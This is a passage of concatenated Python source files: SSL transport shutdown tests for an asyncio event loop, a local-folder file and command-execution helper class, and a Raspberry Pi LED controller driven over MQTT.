loop = self.loop
def server(sock):
sslctx = self._create_server_ssl_context(self.ONLYCERT,
self.ONLYKEY)
sock = sslctx.wrap_socket(sock, server_side=True)
sock.recv(32)
sock.close()
class Protocol(asyncio.Protocol):
def __init__(self):
self.fut = asyncio.Future(loop=loop)
def connection_lost(self, exc):
self.fut.set_result(None)
async def client(addr, ctx):
tr, pr = await loop.create_connection(Protocol, *addr, ssl=ctx)
tr.close()
await pr.fut
with self.tcp_server(server) as srv:
ctx = self._create_client_ssl_context()
loop.run_until_complete(client(srv.addr, ctx))
ctx = weakref.ref(ctx)
if self.implementation == 'asyncio':
# asyncio has no shutdown timeout, but it ends up with a circular
# reference loop - not ideal (introduces gc glitches), but at least
# not leaking
gc.collect()
gc.collect()
gc.collect()
# SSLProtocol should be DECREF to 0
self.assertIsNone(ctx())
def test_shutdown_timeout_handler_not_set(self):
if self.implementation == 'asyncio':
# asyncio doesn't call SSL eof_received() so we can't run this test
raise unittest.SkipTest()
loop = self.loop
extra = None
def server(sock):
sslctx = self._create_server_ssl_context(self.ONLYCERT,
self.ONLYKEY)
sock = sslctx.wrap_socket(sock, server_side=True)
sock.send(b'hello')
assert sock.recv(1024) == b'world'
sock.send(b'extra bytes')
# sending EOF here
sock.shutdown(socket.SHUT_WR)
# make sure we have enough time to reproduce the issue
self.assertEqual(sock.recv(1024), b'')
sock.close()
class Protocol(asyncio.Protocol):
def __init__(self):
self.fut = asyncio.Future(loop=loop)
self.transport = None
def connection_made(self, transport):
self.transport = transport
def data_received(self, data):
if data == b'hello':
self.transport.write(b'world')
# pause reading would make incoming data stay in the sslobj
self.transport.pause_reading()
else:
nonlocal extra
extra = data
def connection_lost(self, exc):
if exc is None:
self.fut.set_result(None)
else:
self.fut.set_exception(exc)
def eof_received(self):
self.transport.resume_reading()
async def client(addr):
ctx = self._create_client_ssl_context()
tr, pr = await loop.create_connection(Protocol, *addr, ssl=ctx)
await pr.fut
tr.close()
# extra data received after transport.close() should be ignored
self.assertIsNone(extra)
with self.tcp_server(server) as srv:
loop.run_until_complete(client(srv.addr))
def test_shutdown_while_pause_reading(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
loop = self.loop
conn_made = loop.create_future()
eof_recvd = loop.create_future()
conn_lost = loop.create_future()
data_recv = False
def server(sock):
sslctx = self._create_server_ssl_context(self.ONLYCERT,
self.ONLYKEY)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
sslobj = sslctx.wrap_bio(incoming, outgoing, server_side=True)
while True:
try:
sslobj.do_handshake()
sslobj.write(b'trailing data')
break
except ssl.SSLWantReadError:
if outgoing.pending:
sock.send(outgoing.read())
incoming.write(sock.recv(16384))
if outgoing.pending:
sock.send(outgoing.read())
while True:
try:
self.assertEqual(sslobj.read(), b'') # close_notify
break
except ssl.SSLWantReadError:
incoming.write(sock.recv(16384))
while True:
try:
sslobj.unwrap()
except ssl.SSLWantReadError:
if outgoing.pending:
sock.send(outgoing.read())
incoming.write(sock.recv(16384))
else:
if outgoing.pending:
sock.send(outgoing.read())
break
self.assertEqual(sock.recv(16384), b'') # socket closed
class Protocol(asyncio.Protocol):
def connection_made(self, transport):
conn_made.set_result(None)
def data_received(self, data):
nonlocal data_recv
data_recv = True
def eof_received(self):
eof_recvd.set_result(None)
def connection_lost(self, exc):
if exc is None:
conn_lost.set_result(None)
else:
conn_lost.set_exception(exc)
async def client(addr):
ctx = self._create_client_ssl_context()
tr, _ = await loop.create_connection(Protocol, *addr, ssl=ctx)
await conn_made
self.assertFalse(data_recv)
tr.pause_reading()
tr.close()
await asyncio.wait_for(eof_recvd, 10)
await asyncio.wait_for(conn_lost, 10)
with self.tcp_server(server) as srv:
loop.run_until_complete(client(srv.addr))
def test_bpo_39951_discard_trailing_data(self):
sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx = self._create_client_ssl_context()
future = None
close_notify = threading.Lock()
def server(sock):
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
sslobj = sslctx.wrap_bio(incoming, outgoing, server_side=True)
while True:
try:
sslobj.do_handshake()
except ssl.SSLWantReadError:
if outgoing.pending:
sock.send(outgoing.read())
incoming.write(sock.recv(16384))
else:
if outgoing.pending:
sock.send(outgoing.read())
break
while True:
try:
data = sslobj.read(4)
except ssl.SSLWantReadError:
incoming.write(sock.recv(16384))
else:
break
self.assertEqual(data, b'ping')
sslobj.write(b'pong')
sock.send(outgoing.read())
with close_notify:
sslobj.write(b'trailing')
sock.send(outgoing.read())
time.sleep(0.5) # allow time for the client to receive
incoming.write(sock.recv(16384))
sslobj.unwrap()
sock.send(outgoing.read())
sock.close()
async def client(addr):
nonlocal future
future = self.loop.create_future()
with close_notify:
reader, writer = await asyncio.open_connection(
*addr,
ssl=client_sslctx,
server_hostname='')
writer.write(b'ping')
data = await reader.readexactly(4)
self.assertEqual(data, b'pong')
writer.close()
try:
await self.wait_closed(writer)
except ssl.SSLError as e:
if self.implementation == 'asyncio' and \
'application data after close notify' in str(e):
raise unittest.SkipTest('bpo-39951')
raise
await future
def run(meth):
def wrapper(sock):
try:
meth(sock)
except Exception as ex:
self.loop.call_soon_threadsafe(future.set_exception, ex)
else:
self.loop.call_soon_threadsafe(future.set_result, None)
return wrapper
with self.tcp_server(run(server)) as srv:
self.loop.run_until_complete(client(srv.addr))
def test_first_data_after_wakeup(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
server_context = self._create_server_ssl_context(
self.ONLYCERT, self.ONLYKEY)
client_context = self._create_client_ssl_context()
loop = self.loop
this = self
fut = self.loop.create_future()
def client(sock, addr):
try:
sock.connect(addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
sslobj = client_context.wrap_bio(incoming, outgoing)
            # Do the handshake manually so that we can collect the last piece
while True:
try:
sslobj.do_handshake()
break
except ssl.SSLWantReadError:
if outgoing.pending:
sock.send(outgoing.read())
incoming.write(sock.recv(65536))
# Send the first data together with the last handshake payload
sslobj.write(b'hello')
sock.send(outgoing.read())
while True:
try:
incoming.write(sock.recv(65536))
self.assertEqual(sslobj.read(1024), b'hello')
break
except ssl.SSLWantReadError:
pass
sock.close()
except Exception as ex:
loop.call_soon_threadsafe(fut.set_exception, ex)
sock.close()
else:
loop.call_soon_threadsafe(fut.set_result, None)
class EchoProto(asyncio.Protocol):
def connection_made(self, tr):
self.tr = tr
# manually run the coroutine, in order to avoid accidental data
coro = loop.start_tls(
tr, self, server_context,
server_side=True,
ssl_handshake_timeout=this.TIMEOUT,
)
waiter = coro.send(None)
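                # the first send() advances start_tls() to the point where it
                # awaits its internal waiter; that waiter is yielded back here,
                # and resuming the coroutine after it completes makes
                # StopIteration carry the finished TLS transport (see below)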
def tls_started(_):
try:
coro.send(None)
except StopIteration as e:
# update self.tr to SSL transport as soon as we know it
self.tr = e.value
waiter.add_done_callback(tls_started)
def data_received(self, data):
# This is a dumb protocol that writes back whatever it receives
# regardless of whether self.tr is SSL or not
self.tr.write(data)
async def run_main():
proto = EchoProto()
server = await self.loop.create_server(
lambda: proto, '127.0.0.1', 0)
addr = server.sockets[0].getsockname()
with self.tcp_client(lambda sock: client(sock, addr),
timeout=self.TIMEOUT):
await asyncio.wait_for(fut, timeout=self.TIMEOUT)
proto.tr.close()
server.close()
await server.wait_closed()
self.loop.run_until_complete(run_main())
class Test_UV_TCPSSL(_TestSSL, tb.UVTestCase):
pass
class Test_AIO_TCPSSL(_TestSSL, tb.AIOTestCase):
pass
|
local.py
|
import os
import shutil
from subprocess import Popen, PIPE # , STDOUT
from contextlib import contextmanager
import logging
from threading import Thread
from atomic_hpc.context_folder.abstract import VirtualDir
from atomic_hpc.utils import splitall
# python 3 to 2 compatibility
try:
basestring
except NameError:
basestring = str
try:
import pathlib
except ImportError:
import pathlib2 as pathlib
try:
from queue import Queue
except ImportError:
from Queue import Queue
logger = logging.getLogger(__name__)
class LocalPath(VirtualDir):
def __init__(self, root):
"""
Parameters
----------
root: pathlib.Path
"""
self._root = root
if not self._root.exists():
self._root.mkdir(parents=True)
def exists(self, path):
""" whether path exists
Parameters
----------
path: str
Returns
-------
"""
path = self._root.joinpath(path)
return path.exists()
def isfile(self, path):
""" whether path is a file
Parameters
----------
path: str
Returns
-------
"""
path = self._root.joinpath(path)
return path.is_file()
def isdir(self, path):
""" whether path is a directory
Parameters
----------
path: str
Returns
-------
"""
path = self._root.joinpath(path)
return path.is_dir()
def stat(self, path):
""" Retrieve information about a file
Parameters
----------
path: str
Returns
-------
attr: object
see os.stat, includes st_mode, st_size, st_uid, st_gid, st_atime, and st_mtime attributes
"""
path = self._root.joinpath(path)
return path.stat()
def chmod(self, path, mode):
""" Change the mode (permissions) of a file
Parameters
----------
path: str
mode: int
new permissions (see os.chmod)
Examples
--------
To make a file executable:
cur_mode = folder.stat("exec.sh").st_mode
folder.chmod("exec.sh", cur_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH )
"""
path = self._root.joinpath(path)
return path.chmod(mode)
def makedirs(self, path):
"""
Parameters
----------
path: str
Returns
-------
"""
logger.debug("making directories: {}".format(path))
parts = splitall(path)
newpath = self._root.joinpath(parts[0])
if not newpath.exists():
newpath.mkdir()
for part in parts[1:]:
newpath = newpath.joinpath(part)
if not newpath.exists():
newpath.mkdir()
def rmtree(self, path):
"""
Parameters
----------
path: str
Returns
-------
"""
logger.debug("removing directories: {}".format(path))
delpath = self._root.joinpath(path)
if self._root.samefile(delpath):
raise IOError("attempting to remove the root directory")
if not delpath.exists():
raise IOError("root doesn't exist: {}".format(path))
if not delpath.is_dir():
raise IOError("root is not a directory: {}".format(path))
for subpath in delpath.glob("**/*"):
if subpath.is_file():
subpath.unlink()
for subpath in reversed(list(delpath.glob("**"))):
subpath.rmdir()
if delpath.exists():
delpath.rmdir()
def remove(self, path):
"""
Parameters
----------
path: str
Returns
-------
"""
logger.debug("removing path: {}".format(path))
delpath = self._root.joinpath(path)
delpath.unlink()
def rename(self, path, newname):
"""
Parameters
----------
path: str
newname: str
Returns
-------
"""
logger.debug("removing path: {0} to {1}".format(path, newname))
path = self._root.joinpath(path)
newname = path.parent.joinpath(newname)
path.rename(newname)
def getabs(self, path):
"""
Parameters
----------
path: str
Returns
-------
abspath: str
"""
path = self._root.joinpath(path)
return str(path.absolute())
@contextmanager
def open(self, path, mode='r', encoding=None):
""" open a file, it will be created if it does not initially exist
Parameters
----------
path: str
mode: str
encoding: str
Returns
-------
"""
logger.debug("opening {0} in mode '{1}'".format(path, mode))
path = self._root.joinpath(path)
if not path.exists():
path.touch()
if not path.is_file():
raise IOError("path is not a file: {}".format(path))
with path.open(mode=mode, encoding=encoding) as f:
yield f
def glob(self, pattern):
""" yield all path that match the pattern in the directory
(not including the root)
Parameters
----------
pattern: str
Yields
-------
path: str
path relative to root
"""
for path in self._root.glob(pattern):
if not path.samefile(self._root):
yield str(path.relative_to(self._root))
def copy(self, inpath, outpath):
""" copy one path to another, where both are internal to the context path
the entire contents of infile will be copied into outpath
Parameters
----------
inpath: str
outpath: str
# contentonly: bool
# if True and inpath is a dir, copy only the content of the inpath, otherwise copy the entire folder
Returns
-------
"""
logger.debug("internally copying {0} to {1}".format(inpath, outpath))
outpath = self._root.joinpath(outpath)
inpath = self._root.joinpath(inpath)
if not inpath.exists():
raise IOError("the inpath does not exist: {}".format(inpath))
if not outpath.exists():
raise IOError("the outpath does not exist: {}".format(outpath))
if hasattr(inpath, "copy_path_obj"):
inpath = inpath.copy_path_obj()
self.copy_from(inpath, os.path.relpath(str(outpath), str(self._root)))
def copy_from(self, source, path):
""" copy from a local source outside the context folder
Parameters
----------
path: str
source: str or path_like
Returns
-------
"""
logger.debug("copying external source {0} to {1}".format(source, path))
subpath = self._root.joinpath(path)
if hasattr(subpath, "copy_from"):
subpath.copy_from(source)
return
source = pathlib.Path(source)
if source.is_file() and source.exists():
shutil.copy(str(source), str(subpath.joinpath(source.name)))
elif source.is_dir() and source.exists():
shutil.copytree(str(source), str(subpath.joinpath(source.name)))
else:
raise IOError("the source is not an existing file or directory: {}".format(source))
def copy_to(self, path, target):
""" copy to a local target outside the context folder
Parameters
----------
path: str
target: str or path_like
Returns
-------
"""
logger.debug("copying {0} to external target to {1}".format(path, target))
subpath = self._root.joinpath(path)
if hasattr(subpath, "copy_to"):
subpath.copy_to(target)
return
        target = pathlib.Path(target)
        if not target.exists():
            raise IOError("the target does not exist: {}".format(target))
        if subpath.is_file():
            shutil.copy(str(subpath), str(target.joinpath(subpath.name)))
        elif subpath.is_dir():
            shutil.copytree(str(subpath), str(target.joinpath(subpath.name)))
        else:
            raise IOError("the path is not an existing file or directory: {}".format(subpath))
@contextmanager
def _exec_in_dir(self, path):
previous_path = os.getcwd()
if hasattr(path, "maketemp"):
with path.maketemp(getoutput=True) as tempdir:
try:
os.chdir(str(tempdir))
yield
finally:
os.chdir(previous_path)
else:
try:
os.chdir(str(path))
yield
finally:
os.chdir(previous_path)
# def exec_cmnd(self, cmnd, path='.', raise_error=False, timeout=None):
# """ perform a command line execution
#
# Parameters
# ----------
# cmnd: str
# path: str
# raise_error: True
# raise error if a non zero exit code is received
# timeout: None or float
# seconds to wait for a pending read/write operation before raising an error
#
# Returns
# -------
# success: bool
#
# """
# logger.debug("executing command in {0}: {1}".format(path, cmnd))
#
# runpath = self._root.joinpath(path)
# runpath.absolute()
# with self._exec_in_dir(runpath):
# # subprocess.run(cmnd, shell=True, check=True)
# process = Popen(cmnd, stdout=PIPE, stderr=PIPE, shell=True)
# with process.stdout as pipe:
# for line in iter(pipe.readline, b''):
# logger.info('{}'.format(line.decode("utf-8").strip()))
# with process.stderr as errpipe:
# for line in iter(errpipe.readline, b''):
# logger.warning('{}'.format(line.decode("utf-8").strip()))
#
# exitcode = process.wait(timeout=timeout) # 0 means success
# if exitcode:
# err_msg = "the following line in caused error code {0}: {1}".format(exitcode, cmnd)
# logger.error(err_msg)
# if raise_error:
# raise RuntimeError(err_msg)
# logging.error(err_msg)
# return False
#
# logger.debug("successfully executed command in {0}: {1}".format(path, cmnd))
# return True
@staticmethod
def _pipe_reader(pipe, name, queue):
try:
with pipe:
for line in iter(pipe.readline, b''):
queue.put((pipe, name, line))
finally:
queue.put(None)
# TODO timeout doesn't work in wait
def exec_cmnd(self, cmnd, path='.', raise_error=False, timeout=None):
""" perform a command line execution
Parameters
----------
cmnd: str
path: str
raise_error: True
raise error if a non zero exit code is received
timeout: None or float
seconds to wait for a pending read/write operation before raising an error
Returns
-------
success: bool
Notes
-----
queuing allows stdout and stderr to output as separate streams, but in (almost) the right order
based on: https://stackoverflow.com/a/31867499/5033292
"""
logger.debug("executing command in {0}: {1}".format(path, cmnd))
security = self.check_cmndline_security(cmnd)
if security is not None:
if raise_error:
raise RuntimeError(security)
logging.error(security)
return False
runpath = self._root.joinpath(path)
        runpath = runpath.absolute()
with self._exec_in_dir(runpath):
# subprocess.run(cmnd, shell=True, check=True)
process = Popen(cmnd, stdout=PIPE, stderr=PIPE, shell=True, bufsize=1)
q = Queue()
Thread(target=self._pipe_reader, args=[process.stdout, "out", q]).start()
Thread(target=self._pipe_reader, args=[process.stderr, "error", q]).start()
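            # each reader thread pushes a final None sentinel when its pipe
            # closes, so drain the queue twice (once per stream)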
for _ in range(2):
for source, name, line in iter(q.get, None):
if name == "out":
getattr(logger, "exec")(line.decode("utf-8").strip())
elif name == "error":
logger.warning(line.decode("utf-8").strip())
else:
raise ValueError("somethings gone wrong")
exitcode = process.wait() # 0 means success
if exitcode:
err_msg = "the following line in caused error code {0}: {1}".format(exitcode, cmnd)
logger.error(err_msg)
if raise_error:
raise RuntimeError(err_msg)
logging.error(err_msg)
return False
logger.debug("successfully executed command in {0}: {1}".format(path, cmnd))
return True
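# ---------------------------------------------------------------------------
# Minimal usage sketch (illustrative only): the "scratch" folder and file
# names below are assumptions, not part of the atomic_hpc API. exec_cmnd() is
# deliberately not exercised here because it logs through a custom "exec"
# level that is registered elsewhere in the package.
if __name__ == "__main__":
    logging.basicConfig(level=logging.DEBUG)
    folder = LocalPath(pathlib.Path("scratch"))
    folder.makedirs("run/output")
    with folder.open("run/output/notes.txt", mode="w") as f:
        f.write("hello from LocalPath\n")
    print(folder.exists("run/output/notes.txt"))  # True
    print(sorted(folder.glob("**/*")))            # paths relative to "scratch"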
|
led-controller.py
|
#!/usr/bin/env python3
#vim: ts=4:et:ai:smartindent
# Copyright 2022 Josh Harding
# licensed under the terms of the MIT license, see LICENSE file
# TODO:
# - Allow remote config (e.g. from Hubitat)
# - Save config changes to file
# - Consider other functions like blink(), pulse(), strobe()
from threading import Timer, Event, Thread
from colorzero import Color
from wiringpi import digitalWrite, pwmWrite, pinMode, OUTPUT, PWM_OUTPUT, wiringPiSetupGpio
from datetime import datetime, timedelta
import configparser
import os
import json
HAVE_MQTT = True
try:
import paho.mqtt.client as mqtt
except ImportError:
HAVE_MQTT = False
HAVE_PCA = True
try:
from adafruit_pca9685 import PCA9685
from board import SCL, SDA
import busio
except ImportError:
HAVE_PCA = False
HAVE_REST = True
try:
from flask import Flask, abort
except ImportError:
HAVE_REST = False
# Global config
MAX_LEVEL = 100 # Accept percentages from client
PWM_PIN = 18 # Used if no config file is present
PWM_MAX = 0x0400 # Pi's PWM scale
PCA_MAX = 0xFFFF # 12-bit resolution at the top of a 16-bit register
MIN_STEP_TIME = 0.01 # 100fps is fast enough for me
MIN_STEP_SIZE = MAX_LEVEL/PWM_MAX
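# Level-to-duty-cycle arithmetic used by the PWM/PCA classes below
# (illustrative numbers): a requested level of 50 becomes
#   int(50 * PWM_MAX / MAX_LEVEL) = 512    on the Pi's 0..1024 PWM scale
#   int(50 * PCA_MAX / MAX_LEVEL) = 32767  on the PCA9685's 16-bit register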
# Base class for controlling an LED with a GPIO pin
class LEDPin:
pintype = 'onoff'
def __init__(self, name, pin, level):
self.name = name
self.pin = int(pin)
self._def_level(level)
self.last_on_level = self.level if self.level else 100
self.last_on_timer = None
self.toggling = ''
self._setup_cmds()
        self.err_msg = None
        # make sure the pin mode and the MQTT-restore flag are set up before
        # the first write and before any broker callbacks can arrive
        self._setup_complete = False
        self._init_pin()
        self.fade({'level': self.level, 'duration': 0})
        if 'mqtt' in config.sections():
            self._mqtt_listen()
def _init_pin(self):
pinMode(self.pin, OUTPUT)
def _setup_cmds(self):
self.commands = {
'on' : self.on,
'off' : self.off,
'toggle': self.toggle,
'fade' : self.fade,
}
self.defaults = {
'fade' : [['level', int, 0]],
'on' : [['duration', float, 1]],
'off' : [['level', int, 0], ['duration', float, 1]],
}
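        # Example (illustrative): an incoming payload of {"cmd": "off"} is
        # filled out by _set_default_args_mqtt() to
        # {"cmd": "off", "level": 0, "duration": 1.0} before dispatch.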
def _def_level(self, level):
self.level = 1 if level == 'on' else 0
def _mqtt_listen(self):
if HAVE_MQTT:
self.topic = f"cmd/{config['mqtt'].get('topic','led')}/{self.name}"
self._mqtt_setup()
def _mqtt_setup(self):
self.client = mqtt.Client()
self.client.on_connect = self._mqtt_connect
self.client.on_message = self._mqtt_message
self.client.connect(config['mqtt'].get('broker', 'mqtt-broker'))
self.client.loop_start()
def _mqtt_connect(self, client, userdata, flags, rc):
print(f"MQTT subscribing to topic {self.topic}/req")
self.client.subscribe(f"{self.topic}/req")
# At startup, get our most recent state from the broker
if not self._setup_complete:
self.client.subscribe(f"{self.topic}/resp")
def _mqtt_message(self, client, userdata, msg):
self.err_msg = None
        if not self._setup_complete and msg.topic == f"{self.topic}/resp":
            self._restore_state(msg)
            return
try:
data = json.loads(msg.payload)
if data['cmd'] in self.commands:
self._set_default_args_mqtt(data)
self.prev_status = self._get_status()
self.commands[data['cmd']](data)
self.send_status()
else:
print(f"Unknown command {data['cmd']}, ignoring")
except json.JSONDecodeError:
self.err_msg = 'non-json data'
except KeyError:
self.err_msg = 'missing or invalid cmd'
def _restore_state(self, msg):
data = json.loads(msg.payload)
try:
if hasattr(self, 'color') and 'color' in data:
self.color = Color(data['color'])
if 'level' in data:
self.level = data['level']
if 'duration' not in data:
data['duration'] = 1
print(f"Restoring previous state of {self.name}: {data}")
self.fade(data)
except Exception as e:
print(f"{self.name}._restore_state({data}): {e}")
self._setup_complete = True
self.client.unsubscribe(f"{self.topic}/resp")
def _set_default_args_mqtt(self, data):
cmd=data['cmd']
if cmd in self.defaults:
for setting in self.defaults[cmd]:
name, datatype, value = setting
if name not in data:
data[name] = datatype(value)
def _set_default_args_rest(self, data, args=[]):
cmd=data['cmd']
if cmd in self.defaults:
for i in range(len(self.defaults[cmd])):
name, datatype, value = self.defaults[cmd][i]
                data[name] = datatype(value if args[i] is None else args[i])
    def on(self, data=None):
        # `data` is accepted (and ignored) so toggle() and the MQTT/REST
        # dispatchers can pass a command dict to every handler
        self.level = 1
        self.toggling = ''
        self._set_level()
    def off(self, data=None):
        self.level = 0
        self.toggling = ''
        self._set_level()
def toggle(self, data=None):
if self.toggling == 'on' or self.level:
self.toggling = 'off'
self.off(data)
else:
self.toggling = 'on'
self.on(data)
def fade(self, data):
self.level = round(data['level'])
self._set_level()
def _set_level(self):
self._log_level()
digitalWrite(self.pin, self.level)
def _log_level(self):
print(f'{datetime.now()}: {self.name} level={self.level}')
def _get_status(self):
return {
'level' : self.level,
'switch': 'on' if self.level else 'off',
}
def send_status(self):
# See if status has changed
curr_status_json = self._get_status()
curr_status_str = json.dumps(curr_status_json, sort_keys=True)
prev_status_str = json.dumps(self.prev_status, sort_keys=True)
isStateChange = True
if prev_status_str == curr_status_str:
isStateChange = False
curr_status_json.update({'isStateChange': isStateChange})
if self.err_msg:
curr_status_json.update({'error': self.err_msg})
status_msg = json.dumps(curr_status_json)
if HAVE_MQTT:
self.client.publish(f"{self.topic}/resp", status_msg, qos=2, retain=True)
return status_msg
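    # Example of the JSON published to "cmd/<topic>/<name>/resp"
    # (illustrative values): {"level": 75, "switch": "on", "isStateChange": true},
    # plus an "error" key whenever err_msg is set.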
class LEDRGB(LEDPin):
pintype = 'rgb'
def __init__(self, name, pin_r, pin_g, pin_b, color):
self.name = name
        if pin_r is None:
            raise Exception(f"[{name}] missing red pin number")
        if pin_g is None:
            raise Exception(f"[{name}] missing green pin number")
        if pin_b is None:
            raise Exception(f"[{name}] missing blue pin number")
self.pins = [int(pin_r), int(pin_g), int(pin_b)]
if color == 'on':
color = 'white'
elif color == 'off':
color = 'black'
        self.color = Color(color)
        self.last_on_color = self.color if self.color.lightness > 0 else Color('white')
        self.last_on_timer = None
        self.toggling = ''
        self.err_msg = None
        self._setup_complete = False
        self._init_pins()
        self._set_color({"color": self.color})
        self._setup_cmds()
        super()._mqtt_listen()
def _setup_cmds(self):
super()._setup_cmds()
self.commands.update({
'color': self._set_color
})
        self.defaults.update({
            'color': [['color', str, 'black']]
        })
def _init_pins(self):
pinMode(self.pins[0], OUTPUT)
pinMode(self.pins[1], OUTPUT)
pinMode(self.pins[2], OUTPUT)
def off(self, data=None):
self._set_color({"color": 'black'})
def on(self, data={}):
if 'color' in data:
self._set_color(data)
else:
self._set_color({"color": self.last_on_color})
def _set_color(self, data):
try:
color = Color(data['color'])
except Exception:
color = Color('black')
self.err_msg = 'Invalid color, using black instead'
self.color = Color(round(color[0]), round(color[1]), round(color[2]))
self.level = 1 if self.color.lightness else 0
self._set_last_on_timer()
self._log_level()
digitalWrite(self.pins[0], int(self.color[0]))
digitalWrite(self.pins[1], int(self.color[1]))
digitalWrite(self.pins[2], int(self.color[2]))
def _set_level(self):
if round(self.level):
self.on()
else:
self.off()
def _set_last_on_timer(self):
if self.last_on_timer:
self.last_on_timer.cancel()
self.last_on_timer = None
self.last_on_timer = Timer(2, self._set_last_on)
self.last_on_timer.start()
def _set_last_on(self):
if self.color.lightness:
self.last_on_color = self.color
self.last_on_timer = None
def _log_level(self):
print(f'{datetime.now()}: {self.name} -- setting color to {self.color.html}')
def _get_status(self):
status = super()._get_status()
status.update({
'color': self.color.html,
'level': self.color.lightness,
'switch': 'on' if self.color.lightness else 'off'
})
return status
class LEDPWM(LEDPin):
pintype = 'pwm'
def __init__(self, name, pin, level=0):
self.timer = None
super().__init__(name, pin, level)
self.target = self.level
self.target_time = 0
self.last_on_timer = None
#self.last_on_level = self.level
#self._setup_cmds()
#self._init_pin()
def _init_pin(self):
pinMode(self.pin, PWM_OUTPUT)
def _def_level(self, level):
if level == 'on':
self.level = 1
elif level == 'off':
self.level = 0
else:
self.level = float(level)
def _setup_cmds(self):
super()._setup_cmds()
# Add commands
self.commands.update({
'downto': self.downto,
'upto' : self.upto,
'inc' : self.inc,
'dec' : self.dec,
'set' : self.fade
})
# Set defaults
self.defaults.update({
'downto': [['level', int, 0], ['duration', float, 1]],
'upto': [['level', int, 100], ['duration', float, 1]],
'fade': [['level', int, 0], ['duration', float, 1]],
'inc': [['level', int, 10], ['duration', float, 0]],
'dec': [['level', int, 10], ['duration', float, 0]],
'set': [['level', int, 0], ['duration', float, 0]],
'toggle': [['duration', float, 1]]
})
    def on(self, data=None):
        # copy so the caller's dict (or a shared default) is never mutated
        data = dict(data) if data else {}
        if 'level' not in data:
            data['level'] = self.last_on_level
        self.fade(data)
    def off(self, data=None):
        data = dict(data) if data else {}
        data['level'] = 0
        self.fade(data)
    def inc(self, data=None):
        data = dict(data) if data else {}
        data['level'] = max(min(self.level + data['level'], 100), 0)
        self.fade(data)
    def dec(self, data=None):
        data = dict(data) if data else {}
        data['level'] = max(min(self.level - data['level'], 100), 0)
        self.fade(data)
def fade(self, data):
self._stop_timer()
self.target = max(min(data['level'], 100), 0)
self.prev_level = self.level
now = datetime.now()
if self.level == self.target or data['duration'] == 0:
print(f'{now}: {self.name} -- setting level from {self.level} to {self.target}')
self.level = self.target
self._set_level()
self.toggling = ''
else:
print(f'{now}: {self.name} -- fading from {self.level} to {data["level"]} in {data["duration"]} seconds')
self.target_time = now + timedelta(seconds=data['duration'])
(step_time, step_level) = self._calc_next_step()
            self.timer = Timer(step_time, self._fade_step, [step_level])
self.timer.start()
def _fade_step(self, step_level):
done = False
print(f"{self.name}: fading to {step_level})")
if self.target > self.level:
if step_level >= self.target:
done = True
else:
if step_level <= self.target:
done = True
if self.target_time <= datetime.now():
done = True
if done:
self._stop_timer()
self._toggle_complete()
else:
self.level = step_level
(step_time, step_level) = self._calc_next_step()
            self.timer = Timer(step_time, self._fade_step, [step_level])
self.timer.start()
self._set_level()
def _toggle_complete(self):
self.toggling = ''
self.level = self.target
if hasattr(self, '_notify_parent'):
self._notify_parent()
def _calc_next_step(self):
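        # Sketch of the step math below: split the remaining fade into steps of MIN_STEP_SIZE
        # level change each, stretch the per-step delay up to at least MIN_STEP_TIME, and scale
        # the step size accordingly so the fade still reaches the target at target_time.
        # Returns (seconds until the next step, level to apply at that step).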
nsteps = abs(self.target - self.level) / MIN_STEP_SIZE
timeleft = (self.target_time - datetime.now()).total_seconds()
steptime = timeleft / nsteps
stepsize = (self.target - self.level) / nsteps
steptime2 = max(steptime, MIN_STEP_TIME)
nsteps2 = nsteps * steptime / steptime2
stepsize2 = stepsize * nsteps / nsteps2
return (steptime2, self.level + stepsize2)
def _stop_timer(self):
if isinstance(self.timer, Timer):
self.timer.cancel()
self.timer = None
def _set_level(self):
self._log_level()
self._set_last_on_timer()
pwmWrite(int(self.pin), int(self.level * PWM_MAX / MAX_LEVEL))
def _set_last_on_timer(self):
if self.last_on_timer:
self.last_on_timer.cancel()
self.last_on_timer = None
self.last_on_timer = Timer(2, self._set_last_on)
self.last_on_timer.start()
def _set_last_on(self):
if self.level:
self.last_on_level = self.level
self.last_on_timer = None
def _log_level(self):
#print(f'{datetime.now()}: {self.name} -- target={self.target} by {self.target_time}, level={self.level}')
pass
def downto(self, data):
if self.level > data['level']:
self.fade(data)
def upto(self, data):
if self.level < data['level']:
self.fade(data)
def _get_status(self):
return {
'level' : self.target,
'switch': 'on' if self.target else 'off',
}
class LEDPCA(LEDPWM):
pintype = 'pca'
def __init__(self, name, pin=0, level=0):
if not HAVE_PCA:
raise Exception(f"Failed to load pca9685 module required for [{name}]")
super().__init__(name, pin, level)
def _init_pin(self):
pass
def _set_level(self):
super()._log_level()
pca.channels[int(self.pin)].duty_cycle = int(self.level * PCA_MAX / MAX_LEVEL)
class LEDPCARGB(LEDPCA):
pintype = 'pcargb'
def __init__(self, name, pin_r, pin_g, pin_b, color):
self.name = name
        if pin_r is None:
            raise Exception(f"[{name}] missing red pin number")
        if pin_g is None:
            raise Exception(f"[{name}] missing green pin number")
        if pin_b is None:
            raise Exception(f"[{name}] missing blue pin number")
if color == 'on':
color = 'white'
elif color == 'off':
color = 'black'
self.color = Color(color)
self.last_on_color = self.color if self.color.lightness > 0 else Color('white')
self.last_on_timer = None
# Create 3 PCA LED's
self.led_r = LEDPCA(name + "_r", pin_r, self.color[0])
self.led_g = LEDPCA(name + "_g", pin_g, self.color[1])
self.led_b = LEDPCA(name + "_b", pin_b, self.color[2])
self.led_r._notify_parent = self._update_color
self.led_g._notify_parent = self._update_color
self.led_b._notify_parent = self._update_color
        self._set_color({'color': color})
self._setup_cmds()
super()._mqtt_listen()
def _init_pins(self):
pass
def _setup_cmds(self):
super()._setup_cmds()
self.commands.update({
'color' : self.set_color,
'hsv' : self.set_hsv,
'set_hue': self.set_hue,
'set_sat': self.set_sat
})
# Extra args for colors
self.defaults.update({
'inc': [['level', int, 10], ['duration', float, 0],
['red', int, 0], ['green', int, 0], ['blue', int, 0]],
'dec': [['level', int, 10], ['duration', float, 0],
['red', int, 0], ['green', int, 0], ['blue', int, 0]],
'color': [['color', str, 'black'], ['duration', float, 1]],
'hsv': [['hue', int, 0], ['saturation', int, 0],
['value', int, 0], ['duration', float, 0]],
'set_hue': [['hue', int, 0], ['duration', float, 0]],
